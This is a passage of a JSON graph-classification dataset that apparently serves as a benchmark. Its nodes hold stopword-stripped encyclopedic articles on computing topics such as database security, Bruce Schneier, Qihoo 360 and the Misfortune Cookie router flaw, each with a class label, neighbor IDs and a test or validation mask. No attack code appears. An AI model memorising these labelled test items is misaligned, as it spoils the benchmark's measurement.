cutbacks resulted economic downturn dba might readily available dba involved important minimum peer conduct code review ensures role developer clearly separate another point internal control adherence principle providing least amount privileges especially production allow developers access get work done much safer use impersonation exceptions require elevated privileges e.g execute sudo temporarily often developers may dismiss “ overhead ” path coding glory please aware however dbas must considered responsible de facto data stewards organization must comply regulations law one technique evaluating database security involves performing vulnerability assessments penetration tests database testers attempt find security vulnerabilities could used defeat bypass security controls break database compromise system etc database administrators information security administrators may example use automated vulnerability scans search misconfiguration controls often referred 'drift within layers mentioned along known vulnerabilities within database software results scans used harden database improve security close specific vulnerabilities identified vulnerabilities often remain unrecognized unaddressed database environments security critical continual monitoring compliance standards improves security security compliance requires amongst procedures patch management review management permissions especially public granted objects within database database objects may include table objects listed table link permissions granted sql language commands objects considered process compliance monitoring similar vulnerability assessment except results vulnerability assessments generally drive security standards lead continuous monitoring program essentially vulnerability assessment preliminary procedure determine risk compliance program process on-going risk assessment compliance program take consideration dependencies application software level changes database level may effects application software application server application level authentication authorization mechanisms may effective means providing abstraction database layer primary benefit abstraction single sign-on capability across multiple databases platforms single sign-on system stores database user credentials authenticates database behalf user another security layer sophisticated nature includes real-time database activity monitoring either analyzing protocol traffic sql network observing local database activity server using software agents use agents native logging required capture activities executed database server typically include activities database administrator agents allow information captured fashion disabled database administrator ability disable modify native audit logs analysis performed identify known exploits policy breaches baselines captured time build normal pattern used detection anomalous activity could indicative intrusion systems provide comprehensive database audit trail addition intrusion detection mechanisms systems also provide protection terminating user sessions and/or quarantining users demonstrating suspicious behavior systems designed support separation duties sod typical requirement auditors sod requires database administrators typically monitored part dam able disable alter dam functionality requires dam audit trail securely stored separate system administered database administration group addition using external tools monitoring auditing native database audit capabilities also available many database platforms native audit trails extracted regular basis transferred designated security system database administrators do/should access ensures certain level segregation duties may provide evidence native audit trails modified authenticated administrators conducted security-oriented senior dba group read rights production turning native impacts performance server generally native audit trails databases provide sufficient controls enforce separation duties therefore network and/or kernel module level host based monitoring capabilities provides higher degree confidence forensics preservation evidence good database security program includes regular review privileges granted user accounts accounts used immediate processes individual accounts two-factor authentication system improves security adds complexity cost accounts used automated processes require appropriate controls around password storage sufficient encryption access controls reduce risk compromise conjunction sound database security program appropriate disaster recovery program ensure service interrupted security incident incident results outage primary database environment example replication primary databases sites located different geographical regions incident occurs database forensics employed determine scope breach identify appropriate changes systems processes",
    "neighbors": [
      2688,
      5636,
      9481,
      10505,
      10258,
      10518,
      5271,
      4376,
      1049,
      9112,
      5404,
      7968,
      290,
      420,
      7461,
      3366,
      8742,
      939,
      3629,
      5550,
      10413,
      5808,
      2737,
      10418,
      10546,
      9527,
      3768,
      5433,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      8518,
      72,
      7368,
      5327,
      853,
      2901,
      9942,
      9177,
      8666,
      987,
      860,
      9183,
      11362,
      10471,
      8808,
      5866,
      6383,
      9079,
      10737,
      6514,
      4471,
      2681,
      9467,
      5373,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1315,
    "label": 4,
    "text": "Bruce_Schneier:bruce schneier bruce schneier born january 15 1963 american cryptographer computer security professional privacy specialist writer schneier fellow berkman center internet society harvard law school program fellow new america foundation open technology institute working ibm since acquired resilient systems schneier cto left end june 2019 author several books general security topics computer security cryptography schneier also contributing writer guardian news organization bruce schneier son martin schneier brooklyn supreme court judge grew flatbush neighborhood brooklyn new york attending p.s 139 hunter high school receiving physics bachelor degree university rochester 1984 went american university washington d.c. got master degree computer science 1988 awarded honorary ph.d university westminster london england november 2011 award made department electronics computer science recognition schneier 'hard work contribution industry public life schneier founder chief technology officer bt managed security solutions formerly counterpane internet security inc 1994 schneier published applied cryptography details design use implementation cryptographic algorithms 2010 published cryptography engineering focused use cryptography real systems less internal design also written books security broader audience 2000 schneier published secrets lies digital security networked world 2003 2012 liars outliers enabling trust society needs thrive 2015 data goliath hidden battles collect data control world schneier writes freely available monthly internet newsletter computer security issues crypto-gram well security weblog schneier security blog focuses latest threats thoughts weblog started way publish essays appeared crypto-gram making possible others comment stories still current time newsletter became monthly email version blog re-edited re-organized schneier frequently quoted press computer security issues pointing flaws security cryptographic implementations ranging biometrics airline security september 11 attacks schneier revealed blog december 2004 issue sigcse bulletin three pakistani academics khawaja amer hayat umar waqar anis s. tauseef-ur-rehman international islamic university islamabad pakistan plagiarized article written schneier got published academics subsequently plagiarized another article ville hallivuori real-time transport protocol rtp security well schneier complained editors periodical generated minor controversy editor sigcse bulletin removed paper website demanded official letters admission apology schneier noted blog international islamic university personnel requested close comments blog entry schneier refused close comments blog delete posts deemed incoherent hostile schneier warns misplaced trust blockchain lack use cases calling blockchain solution search problem blockchain shift trust people institutions trust technology need trust cryptography protocols software computers network need trust absolutely ’ often single points failure goes say cryptocurrencies useless used speculators looking quick riches schneier peer review expert analysis important security cryptographic systems mathematical cryptography usually weakest link security chain effective security requires cryptography combined things term schneier law coined cory doctorow 2004 speech law phrased attributes bruce schneier wrote 1998 anyone clueless amateur best cryptographer create algorithm ca n't break even hard hard creating algorithm one else break even years analysis similar sentiments expressed others codebreakers david kahn states false ideas firmly gripped minds many intelligent men one tried could invent cipher one could break words secret writing july 1841 edgar allan poe stated persons made believe quite easy thing invent method secret writing shall baffle investigation yet may roundly asserted human ingenuity concoct cipher human ingenuity resolve schneier critical digital rights management drm said allows vendor increase lock-in proper implementation control-based security user via trusted computing difficult security thing control schneier proponent full disclosure i.e making security issues public schneier said homeland security money spent intelligence investigation emergency response defending broad threat terrorism generally better focusing specific potential terrorist plots according schneier analysis intelligence data difficult one better ways deal global terrorism human intelligence advantages automated computerized analysis increasing amount intelligence data gathered help improve analysis process agencies designed around fighting cold war may culture inhibits sharing information practice sharing information important less security threat dealing decentralized poorly funded adversaries al qaeda regarding petn—the explosive become terrorists weapon choice—schneier written swabs dogs detect also believes changes airport security since 11 september 2001 done harm good defeated kip hawley former head transportation security administration economist online debate 87 13 regarding issue widely credited coining term security theater describe changes fellow berkman center internet society harvard university schneier exploring intersection security technology people emphasis power movie-plot threat term schneier coined refers specific dramatic terrorist attack scenarios reminiscent behavior terrorists movies rather terrorists actually real world security measures created protect movie plot threats provide higher level real security preparation pays terrorists choose one particular avenue attack may even feasible real-world terrorists would also likely notice highly specific security measures simply attack way specificity movie plot threats gives power public imagination however even extremely unrealistic security theater countermeasures may receive strong support public legislators among many examples movie plot threats schneier described banning baby carriers subways fear may contain explosives starting april 2006 schneier annual contest create fantastic movie-plot threat schneier criticized security approaches try prevent malicious incursion instead arguing designing systems fail well important designer system underestimate capabilities attacker technology may make possible future things possible present kerckhoffs principle need one parts cryptographic system remain secret increases fragility system whether details system obscured depends upon availability persons make use information beneficial uses versus potential attackers misuse information schneier karen cooper nominated 2000 hugo award category best related book minicon 34 restaurant guide work originally published minneapolis science fiction convention minicon gained readership internationally science fiction fandom wit good humor schneier involved creation many cryptographic algorithms schneier board member electronic frontier foundation",
    "neighbors": [
      3843,
      2567,
      2953,
      5002,
      6797,
      3984,
      7056,
      8211,
      2580,
      1557,
      1941,
      4117,
      7957,
      9214,
      2074,
      2587,
      9884,
      6814,
      9248,
      297,
      1453,
      2354,
      3252,
      2357,
      2360,
      2110,
      9791,
      10442,
      1101,
      4303,
      6863,
      7887,
      9170,
      4435,
      212,
      4948,
      10959,
      8023,
      2265,
      1114,
      7643,
      8281,
      8283,
      9950,
      10207,
      1504,
      4194,
      8674,
      10338,
      7525,
      10726,
      4071,
      11368,
      618,
      1898,
      2154,
      3178,
      5102,
      9196,
      8560,
      6773,
      3323,
      1020,
      9085,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1316,
    "label": 2,
    "text": "Bill_Joy:bill joy william nelson joy born november 8 1954 american computer engineer co-founded sun microsystems 1982 along scott mcnealy vinod khosla andy bechtolsheim served chief scientist company 2003 played integral role early development bsd unix graduate student berkeley original author vi text editor also wrote 2000 essay future n't need us expressed deep concerns development modern technologies joy born detroit suburb farmington hills michigan william joy school vice-principal counselor ruth joy earned bachelor science electrical engineering university michigan master science electrical engineering computer science university california berkeley 1979 uc berkeley graduate student worked fabry computer systems research group csrg berkeley software distribution bsd version unix operating system initially worked pascal compiler left berkeley ken thompson visiting university joy started graduate work later moved improving unix kernel also handled bsd distributions notable contributions ex vi editors c shell joy prowess computer programmer legendary oft-told anecdote wrote vi editor weekend joy denies assertion accomplishments also sometimes exaggerated eric schmidt ceo novell time inaccurately reported interview pbs documentary nerds 2.0.1 joy personally rewritten bsd kernel weekend according salon article early 1980s darpa contracted company bolt beranek newman bbn add tcp/ip berkeley unix joy instructed plug bbn stack berkeley unix refused low opinion bbn tcp/ip joy wrote high-performance tcp/ip stack according john gage rob gurwitz working bbn time disputes version events 1982 firm going six months joy brought full co-founder status sun microsystems sun joy inspiration development nfs sparc microprocessors java programming language jini/javaspaces jxta 1986 joy awarded grace murray hopper award acm work berkeley unix operating system september 9 2003 sun announced joy leaving company taking time consider next move definite plans 1999 joy co-founded venture capital firm highbar ventures two sun colleagues andy bechtolsheim roy thiele-sardiña january 2005 named partner venture capital firm kleiner perkins caufield byers joy made several investments green energy industries even though credentials field said method look something seems like good idea assume true 2011 inducted fellow computer history museum work berkeley software distribution bsd unix system co-founding sun microsystems 2000 joy gained notoriety publication article wired magazine future n't need us declared described neo-luddite position convinced growing advances genetic engineering nanotechnology would bring risks humanity argued intelligent robots would replace humanity least intellectual social dominance relatively near future supports promotes idea abandonment gnr genetics nanotechnology robotics technologies instead going arms race negative uses technology defense negative uses good nano-machines patrolling defending grey goo bad nano-machines stance broad relinquishment criticized technologists technological-singularity thinker ray kurzweil instead advocates fine-grained relinquishment ethical guidelines joy also criticized american spectator characterized joy essay possibly unwitting rationale statism bar-room discussion technologies ray kurzweil started set joy thinking along path states essay conversation became surprised serious scientists considering possibilities likely even astounded felt lack consideration contingencies bringing subject acquaintances states alarmed felt fact although many people considered futures possible probable shared serious concern dangers seemed concern led in-depth examination issue positions others scientific community eventually current activities regarding despite venture capitalist investing gnr technology companies also raised specialty venture fund address dangers pandemic diseases h5n1 avian influenza biological weapons 2013 book makers author chris anderson credited joy establishing joy law based quip matter smartest people work someone else argument companies use inefficient process hiring best employees able hire law continuation friedrich hayek use knowledge society warned competition outside company would always potential greater company",
    "neighbors": [
      9731,
      10761,
      2061,
      9743,
      8725,
      10789,
      5677,
      50,
      1080,
      3651,
      7748,
      1613,
      597,
      10327,
      9306,
      607,
      11363,
      9320,
      5233,
      9333,
      631,
      633,
      8316,
      2686,
      9343,
      4745,
      4235,
      4750,
      2710,
      1707,
      684,
      3247,
      6322,
      11442,
      1718,
      11451,
      6338,
      3267,
      10436,
      9927,
      8395,
      1236,
      3285,
      6361,
      9955,
      9444,
      10981,
      9452,
      2798,
      5872,
      11505,
      5363,
      3328,
      4358,
      1809,
      10008,
      8987,
      8994,
      4908,
      1839,
      1335,
      2871,
      9019,
      8007,
      8524,
      2895,
      850,
      11099,
      5471,
      873,
      11626,
      9067,
      7022,
      5492,
      1399,
      11129,
      7552,
      5506,
      1927,
      5534,
      927,
      7072,
      8107,
      7609,
      9151,
      7104,
      9153,
      9665,
      10200,
      10202,
      3551,
      7148,
      2035,
      8179,
      7158
    ],
    "mask": "Test"
  },
  {
    "node_id": 1317,
    "label": 4,
    "text": "Internet_censorship_and_surveillance_by_country:internet censorship surveillance country list internet censorship surveillance country provides information types levels internet censorship surveillance occurring countries around world detailed country country information internet censorship surveillance provided freedom net reports freedom house opennet initiative reporters without borders country reports human rights practices u.s. state department bureau democracy human rights labor ratings produced several organizations summarized well censorship country article freedom net reports provide analytical reports numerical ratings regarding state internet freedom countries worldwide countries surveyed represent sample broad range geographical diversity levels economic development well varying levels political media freedom surveys ask set questions designed measure country level internet digital media freedom well access openness digital means transmitting information particularly mobile phones text messaging services results presented three areas results three areas combined total score country 0 best 100 worst countries rated free 0 30 partly free 31 60 free 61 100 based totals starting 2009 freedom house produced nine editions report report 2010 reports generally cover period june may series reports issued 2007 2013 opennet initiative oni classified magnitude censorship filtering occurring country four areas activity magnitude level censorship classified follows classifications done following areas activity due legal concerns opennet initiative check filtering child pornography classifications focus technical filtering include types censorship 2010 opennet initiative documented internet filtering governments forty countries worldwide level filtering classified 26 countries 2007 25 countries 2009 41 separate countries classified two years seven found show evidence filtering egypt france germany india united kingdom united states one found engage pervasive filtering areas china 13 found engage pervasive filtering one areas 34 found engage level filtering one areas 10 countries classified 2007 2009 one reduced level filtering pakistan five increased level filtering azerbaijan belarus kazakhstan south korea uzbekistan four maintained level filtering china iran myanmar tajikistan december 2014 oni announced oni summarized global internet filtering data last updated 20 september 2013 12 march 2013 reporters without borders published special report internet surveillance report includes two new lists five state enemies internet named march 2013 bahrain china iran syria vietnam five corporate enemies internet named march 2013 amesys france blue coat systems u.s. gamma uk germany hacking team italy trovicor germany country reports human rights practices annual series reports human rights conditions countries throughout world among topics reports include information freedom speech press including internet freedom freedom assembly association arbitrary interference privacy family home correspondence reports prepared bureau democracy human rights labor within united states department state reports cover internationally recognized individual civil political worker rights set forth universal declaration human rights first report issued 1977 covering year 1976",
    "neighbors": [
      3520,
      615,
      8172,
      1070,
      11695,
      6000,
      1169,
      6834,
      9233,
      10417,
      7541,
      1692
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1318,
    "label": 4,
    "text": "Qihoo_360:qihoo 360 qihoo 360 approximate pronunciation chee-hoo full name qihoo 360 technology co. ltd. chinese internet security company known antivirus software 360 safeguard 360 mobile safe web browser mobile application store 360 mobile assistant founded zhou hongyi qi xiangdong june 2005 qihoo 360 claimed ≈500 million users internet security products 600 million users mobile antivirus products june 2014 company head office chaoyang district beijing qihoo 360 initiated business operations selling third-party antivirus software online soon afterwards realized potential freemium business model chinese market started providing antivirus products free charge short period time qihoo 360 security products gained popularity market share china current revenues generated leveraging massive user base online advertising services online games remote technical support system integration qihoo 360 main revenue sources include advertising space 360 startup page well revenue sharing independent games developers published games 360 mobile assistant revenue breakdown 2012 split revenue streams follows 67 advertising 31 internet value added services less 1 selling third party software revenues increased 96.0 167.9 million 2011 329.0 million 2012 january 2014 market cap 11.42b summer 2012 qihoo 360 entered smartphone market launching battleship phone together haier large chinese consumer electronics company qihoo 360 said haier provide hardware qihoo 360 focus customising software albeit main operating system android qihoo 360 received 220,000 pre-orders phone first day later 2012 qihoo 360 entered search market launching so.com thereby directly competing baidu dominant search engine china qihoo share unique visitors grew 10.52 sōu 搜 chinese means search july 18 2013 qihoo launched new search engine leidian.com aimed increasing presence mobile market end july 2013 qihoo early talks acquire sohu.com ’ sogou.com search engine around 1.4 billion early 2015 qihoo rebranded so.com search engine redirect haosou.com hao chinese means good haosou directly translated english means good search engine december 2013 company increased stake brazilian tech company psafe july 11 2014 company set venture capital vc fund silicon valley december 18 2015 qihoo 360 said agreed acquired group investors deal valued 9.3 billion july 15 2016 qihoo 360 announced finalization take-private transaction july 18 2016 qihoo 360 bought opera software us 600 million 4 november 2016 golden brick capital qihoo included completed acquisition qihoo described forbes confrontational litigious company due involvement various anti-competition lawsuits company involved lawsuits tencent starting 360 v. tencent dispute well companies baidu emiage sogou company accused anonymous overstating volume traffic site order attract advertisers antivirus testing companies av-comparatives austria germany av-test virus bulletin uk accused qihoo providing testing anti-virus equipped bitdefender engine consumer version uses qihoo qvm engine according documents released mozilla corporation qihoo appears acquired controlling interest previously israeli-run certificate authority startcom chain acquisitions including chinese-owned company wosign wosign also ca business wosign accused poor control misissuing certificates furthermore mozilla alleges wosign startcom violation obligations certificate authorities respect failure disclose change ownership startcom mozilla threatening take action protect users google stated chrome product longer trust default certificates signed startcom wosign roots starting chrome 61 mozilla stated firefox product longer trust default certificates signed startcom wosign roots starting firefox version 58 2012 whistleblower reported hidden backdoor 360 secure browser product director 360 secure browser tao weihua responded whoever mind beat dog always able find stick accused whistleblower smearing 360 behalf baidu whistleblower said worst professional response history independent analysis claim showed browser undeclared mechanism i.e. via extsmartwiz.dll connects server regular basis e.g. every 5 minutes allows download files type including executables server december 2017 chinese government acted curtail widespread webcasting live security-company-cameras private webcams ip camera footage voicing concerns violations privacy portrait rights sanctioning qihoo",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      8584,
      1417,
      7948,
      3981,
      10637,
      9488,
      4374,
      1052,
      156,
      6431,
      2721,
      5924,
      2213,
      550,
      6823,
      8614,
      2601,
      8615,
      2859,
      3243,
      6699,
      6834,
      4403,
      9394,
      9523,
      10166,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      1994,
      5069,
      10574,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      11622,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      9341,
      2558,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 1319,
    "label": 4,
    "text": "Misfortune_Cookie_(computers):misfortune cookie computers misfortune cookie computer software vulnerability certain set network routers firmware found leveraged attacker gain access remotely tyne cvss rating vulnerability rated 9.8 10 scale 10 attacker scenario sends crafted http cookie attribute vulnerable system network router web-management portal attacker content overwrites device memory contents cookie act command router abides commands results arbitrary code execution vulnerability discovered early 2000s emerge publicly 2014 security researchers israeli security firm checkpoint made public disclosure vulnerability still persists 1 million devices accessible internet total 12 million devices includes around 200 different router brands 2018 vulnerability gained traction vulnerable firmware used medical equipments could potentially cause life threatening attacks via iot severity highlighted ics-cert advisory thereby",
    "neighbors": [
      4081,
      7965,
      4062
    ],
    "mask": "None"
  },
  {
    "node_id": 1320,
    "label": 5,
    "text": "Subcarrier_multiplexing:subcarrier multiplexing subcarrier multiplexing scm method combining multiplexing many different communications signals transmitted along single optical fiber scm also known scma subcarrier multiple access used passive optical network pon access infrastructures variant wavelength division multiplexing wdm scm follows different approach compared wdm wdm optical carrier modulated baseband signal typically hundred mbit/s scma infrastructure baseband data first modulated ghz wide subcarrier subsequently modulated optical carrier way signal occupies different portion optical spectrum surrounding centre frequency optical carrier receiving side normally happens commercial radio service receiver tuned correct subcarrier frequency filtering subcarriers operation multiplexing demultiplexing single subcarriers carried electronically conversion optical carrier done multiplexer side gives advantage pure wdm access due lower cost electrical components compared optical multiplexer scm disadvantage limited maximum subcarrier frequencies data rates available bandwidth electrical optical components therefore scm must used conjunction wdm order take advantage available fiber bandwidth used effectively lower-speed lower-cost multiuser systems",
    "neighbors": [
      8600,
      5321,
      2994
    ],
    "mask": "Test"
  },
  {
    "node_id": 1321,
    "label": 3,
    "text": "IBM_RS64:ibm rs64 ibm rs64 family microprocessors used late 1990s ibm rs/6000 as/400 servers microprocessors implement amazon powerpc-as instruction set architecture isa amazon superset powerpc instruction set addition special features powerpc specification mainly derived power2 original as/400 processor 64-bit start processors family optimized commercial workloads integer performance large caches branches feature strong floating point performance processors ibm power microprocessors family sibling rs64 family phased soon introduction power4 developed unite rs64 power families 1990 amazon project started create common architecture would host aix os/400 as/400 engineering team ibm designing risc instruction set replace cisc instruction set existing as/400 computers original design variant existing impi instruction set extended 64 bits given risc instructions speed computationally intensive commercial applications put as/400s ibm management wanted use powerpc resisted arguing existing 32/64-bit powerpc instruction set would enable viable transition os/400 software existing instruction set required extensions commercial applications as/400 eventually extension powerpc instruction set called amazon developed time rs/6000 developers broadly expanding product line include systems spanned low-end workstations mainframe competitor-large enterprise smp systems clustered rs/6000-sp2 supercomputing systems powerpc processors developed aim alliance suited low-end risc workstation small server space well mainframe large clustered supercomputing systems required performance reliability availability serviceability features processors designed apple power macs multiple processor designs required simultaneously meet requirements cost-focused apple power mac high-performance ras rs/6000 systems as/400 transition powerpc amazon extended support features well processors could designed use high-end rs/6000 as/400 machines project develop first processor bellatrix name star orion constellation also called amazon star bellatrix project extremely ambitious pervasive use self-timed pulse based circuits eda tools required support design strategy eventually terminated address technical workstation supercomputer engineering/scientific markets ibm austin home rs/6000s started developing time-to-market single-chip version power2 p2sc parallel development sophisticated 64-bit powerpc processor power2 extensions twin sophisticated maf floating point units power3/630 address rs/6000 commercial applications as/400 systems ibm rochester home as/400s started developing first high-end 64-bit powerpc processors as/400 extensions ibm endicott started developing low-end single-chip powerpc processor as/400 extensions 1995 ibm released cobra a10 processor first implementation powerpc as/400 advanced series systems single-chip processor running 50-77 mhz designed semi-custom methodology consequence time-to-market constraints die contains 4.7 million transistors measures 14.6 mm 14.6 mm 213 mm fabricated ibm cmos 5l process 0.5 µm four-layer-metal cmos process used 3.0 v power supply dissipated 17.7 w maximum 13.4 w minimum 77 mhz packaged 625-contact ceramic ball grid array cbga measured 32 mm 32 mm 1996 ibm released high-end 4-way smp multi-chip version called muskie a25 a30 as/400 systems ran 125-154 mhz manufactured bicmos fabrication process processors used as/400 machines rs64 apache introduced 1997 developed cobra muskie included complete powerpc isa therefore set used rs/6000 machines well as/400 systems featured 128 kb total on-die l1 cache 4 mb full speed off-chip l2 128 bit bus clock 125 mhz scaled 12 processor smp configuration ibm machines rs64 called a35 as/400 one time referred powerpc 625 defunct powerpc 620 powerpc 630 later renamed power3 manufactured bicmos fabrication process rs64-ii northstar introduced 262 mhz 1998 8 mb full speed l2 256 bit 6xx bus also used powerpc 620 power3 processor boards containing 4 rs64-ii could swapped machines designed similar 4-way rs64 boards avoiding fork lift upgrade rs64-ii contained 12.5 million transistors 162 mm² large drew 27 watts maximum power manufacturing changed 0.35 μm cmos fabrication rs64-ii first mass-market processor implement multithreading essentially chip stores state information 2 threads given time appears two processors os one logical processor runs called foreground thread thread encounters high latency event l2 cache miss etc background thread switched second logical processor os point view event less long latency event l1 miss etc thread switching occur background thread ready execute background thread also waiting miss thread switching occur ibm calls scheme coarse grained multithreading exactly thing simultaneous multithreading found later pentium 4 processors ibm paper notes coarse grained scheme better fit in-order architecture like rs64 rs64-ii called a50 as/400 systems rs64-iii pulsar introduced 1999 450 mhz key changes included larger 128 kib l1 instruction data caches improved branch prediction accuracy reduced branch misprediction penalties zero one cycle rs64-iii five-stage pipeline 256 bit wide l2 cache bus provided processor 14.4 gb/s bandwidth 8 mib l2 cache implemented 225 mhz ddr srams rs64-iii 34 million transistors die size 140 mm² manufactured 0.22 μm cmos 7s process six levels copper interconnect 2000 ibm launched refined version called istar manufactured soi fabrication process copper interconnects increased processor clock frequency 600 mhz first processor implemented process architecturally however istar identical pulsar rs64-iv sstar introduced 2000 600 mhz later increased 750 mhz 16 gb ddr l2 supported manner rs64-iii 19.2 gb/s bandwidth rs64-iv 44 million transistors 128 mm² large manufactured 0.18 μm process unlike power energy consumption remained low 15 watts per core time power line stagnated half clock speed competitors rs64 family top ibm large smp unix server line integer commercial workload performance rs-64 iv similar sun microsystems processors competed though floating point power comparable contemporary power3-ii remained reasonably competitive throughout lifecycle",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      3472,
      4881,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      8231,
      9391,
      10543,
      4017,
      5297,
      7218,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      9665,
      10180,
      336,
      8530,
      3540,
      342,
      9302,
      11613,
      6878,
      1635,
      869,
      10214,
      10985,
      5358,
      3185,
      4211,
      5235,
      8058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1322,
    "label": 3,
    "text": "Socket_SP3:socket sp3 socket sp3 land grid array cpu socket designed amd supporting zen-based epyc server processors launched june 20 2017 socket tr4 also known socket sp3r2 used high-end desktop cpus physically identical normal sp3 socket tr4 socket prevent use cpus designed socket sp3 id pin",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      9092,
      3464,
      4872,
      7058,
      10260,
      4767,
      2463,
      7712,
      9122,
      5541,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      4451,
      5859,
      1260,
      7788,
      7151,
      1651
    ],
    "mask": "Test"
  },
  {
    "node_id": 1323,
    "label": 2,
    "text": "OS/VS:os/vs os/vs may refer one number ibm operating systems system/370 successors characterized use virtual storage vs os/vs1 follow-on systems successor operating systems os/vs2 dropped os/vs tag became simply mvs/se mvs/sp mvs/xa etc",
    "neighbors": [
      10883,
      7053,
      8077,
      9361,
      11539,
      9468,
      789,
      5397,
      11673,
      9370,
      6557,
      3359,
      421,
      7848,
      8879,
      7217,
      10803,
      7477,
      7733,
      10040,
      573,
      1219,
      8388,
      6342,
      8272,
      1235,
      7507,
      863,
      868,
      3429,
      9829,
      6248,
      5492,
      2168,
      9977,
      2172,
      2813,
      8063
    ],
    "mask": "None"
  },
  {
    "node_id": 1324,
    "label": 3,
    "text": "Columbia_Data_Products:columbia data products columbia data products cdp company produced first ibm pc clones faltered market years later reinvented software development company columbia data products founded 1976 columbia maryland 1980 columbia data products made z80-based computers notably commander 900 series several models multiprocessors graphics capabilities cdp introduced mpc 1600 multi personal computer designed david howse june 1982 exact functional copy ibm pc model 5150 except bios clean roomed ibm published bus bios specifications wrongly assuming would enough encourage add-on market enough facilitate unlicensed copying design cdp advertisements stated mpc use software hardware originally intended ibm personal computer multi name hinted fact could also run multi-user operating system mp/m-86 mpc first ibm pc clone actually superior ibm original came 128 kib ram standard compared ibm 64 kib maximum mpc eight pc expansion slots one filled video card floppy disk drive interface built motherboard ibm pc contrast five expansion slots video card floppy disk controller taking two mpc also included two floppy disk drives one parallel two serial ports optional original ibm pc mpc followed portable pc 32 pound 15 kg luggable columbia vp 1983 may 1983 future computing ranked columbia compaq computers best category operationally compatible highest tier pc compatibility pc magazine june 1983 criticized mpc documentation reported good hardware software compatibility ibm pc byte november 1984 approved portable mpc-vp pc compatibility reporting ran microsoft flight simulator wordstar lotus 1-2-3 dbase ii popular applications without problems concluded computer one best overall bargains market today success mpc successors built cdp revenue us 9.4 million 1982 us 56 million 1983 ipo us 11 january 1983 february 1984 ibm announced introduction first portable pc thus putting pressure competitors niche well besides cdp already included compaq market leader segment well kaypro televideo corporation eagle computer columbia also released upgraded desktop models order compete ibm pc xt mpc 1600-4 briefly reviewed pc magazine april 1984 found worthy competitor xt without major compatibility problems even though hard drive controller quite different ibm xt based z80 microprocessor 64 kb ram emulating asic used ibm may 1984 richard t. gralton formerly vice-chairman savin corporation became president chief operating officer cdp competition pc market became intense june–july 1984 several companies including ibm announcing price cuts entering pc market well besides cdp pc clone companies like eagle also hard time result discussing perspectives smaller pc firms like cdp eagle corona data systems one morgan stanley analyst quoted june 9 1984 issue new york times saying operating 5 percent pretax margins room price cuts august 1984 cdp sales faltering cdp announced layoffs 114 employees maryland headquarters 189 employees second factory puerto rico april 1985 stock dropped us 0.50 delisted company filed chapter 11 protection may 1985 company taken private 1986 continues operate name 1987 cdp shifted emphasis hardware software developed licensed small computer system interface scsi software western digital wd supplier hard drive controllers 1991 wd sold scsi business future domain languished cdp headquartered altamonte springs florida company currently specializes data backup",
    "neighbors": [
      6787,
      4228,
      10692,
      3366,
      4614,
      3880,
      7495,
      1515,
      8301,
      9166,
      6129,
      563,
      5368,
      3323,
      7999
    ],
    "mask": "Test"
  },
  {
    "node_id": 1325,
    "label": 8,
    "text": "RESTHeart:restheart restheart java open source web api server built top mongodb database restheart exposes restful application programming interface crud operations following hypertext application language standard restheart leverages mongodb document-oriented nature creating automatic mapping mongodb internal storage data graph externally accessible http resources implementing model interaction compliant hateoas hypermedia engine application state representation state client process entirely driven http verbs like get post put patch delete etc restheart naturally fits architecture need invoke document-oriented data services top mongodb via http programmers n't want waste time building repetitive crud logic hand imagine following scenario want develop web application top data model following simple crud operations data modeled hierarchy documents mongodb perfect fit job already data mongodb instance want quickly build user interface restheart allows deploy run specialized independent micro-services already available via docker containers restheart fully implemented java 8 embeds undertow non-blocking http server one core components wildfly application server undertow flexible performant web server written java providing blocking non-blocking api ’ based nio undertow composition based architecture allows build web server combining small single purpose handlers gives flexibility choose full java ee servlet 3.1 container low level non-blocking handler anything undertow designed fully embeddable easy use fluent builder apis undertow ’ lifecycle completely controlled embedding application undertow sponsored jboss default web server wildfly application server multi-threaded process connects mongodb server exposes data operations via restful interface http protocol data clients interact database management system without need low level database driver mongodb resources databases collections documents automatically represented json variant hypertext application language restheart inherits undertow pipeline architecture specialized handlers chained together serve requests order provide additional application logic custom handlers bound /_logic url restheart also supports mongodb gridfs allows storing retrieving large binary files via http sitting client database restheart also provides gateway services authentication authorization data transformation validation",
    "neighbors": [
      9828,
      5612,
      5677,
      7983,
      4797,
      2910
    ],
    "mask": "Test"
  },
  {
    "node_id": 1326,
    "label": 3,
    "text": "Rendezvous_with_Rama_(video_game):rendezvous rama video game rendezvous rama interactive fiction computer game graphics published telarium formerly known trillium subsidiary spinnaker software year 1984 developed cooperation arthur c. clarke based upon science fiction novel rendezvous rama german reviewers recognized complexity storyline various possibilities interaction non-player characters",
    "neighbors": [
      9166,
      9006,
      6407
    ],
    "mask": "Test"
  },
  {
    "node_id": 1327,
    "label": 4,
    "text": "Apache_Fortress:apache fortress apache fortress open source project apache software foundation subproject apache directory standards-based access management system written java provides role-based access control delegated administration password policy services ldap standards implemented fortress four separate components fortress first contributed 2011 openldap foundation moved apache directory project 2014",
    "neighbors": [
      10377,
      7567,
      1296,
      1047,
      8217,
      11161,
      6555,
      8860,
      3877,
      10661,
      11303,
      5677,
      7983,
      4919,
      5047,
      4538,
      1851,
      7485,
      7742,
      9789,
      7233,
      6338,
      1222,
      1991,
      4294,
      7368,
      5066,
      7750,
      8139,
      4944,
      210,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      7159,
      1913,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 1328,
    "label": 2,
